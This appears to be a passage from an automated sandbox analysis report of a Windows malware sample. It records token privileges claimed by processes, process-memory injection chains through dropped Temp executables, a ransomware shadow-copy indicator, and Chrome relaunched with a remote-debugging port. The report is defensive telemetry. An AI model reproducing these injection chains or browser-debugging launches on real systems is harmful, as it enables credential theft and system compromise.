Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1264 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
PID 1264 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
PID 1264 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
PID 1920 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
PID 1920 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
PID 1920 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
PID 2000 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2000 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2000 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1920 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
PID 1920 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
PID 1920 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
PID 1264 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
PID 1264 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
PID 1264 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
PID 3444 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3444 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3444 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3444 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
PID 3444 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
PID 3444 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
PID 4852 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 2192 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 2192 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe

"C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5072 -ip 5072

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 960

C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

"C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffb9ca0cc40,0x7ffb9ca0cc4c,0x7ffb9ca0cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1876,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1872 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2284 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2320 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3248 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3488,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3232,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3664 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4680 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4652,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4600 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe

"C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4836,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4908 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4624,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4812 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4680,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4980 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5080,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4908 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5164,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3088 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4992,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5312 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5012,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5368 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe"

C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6124 -ip 6124

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

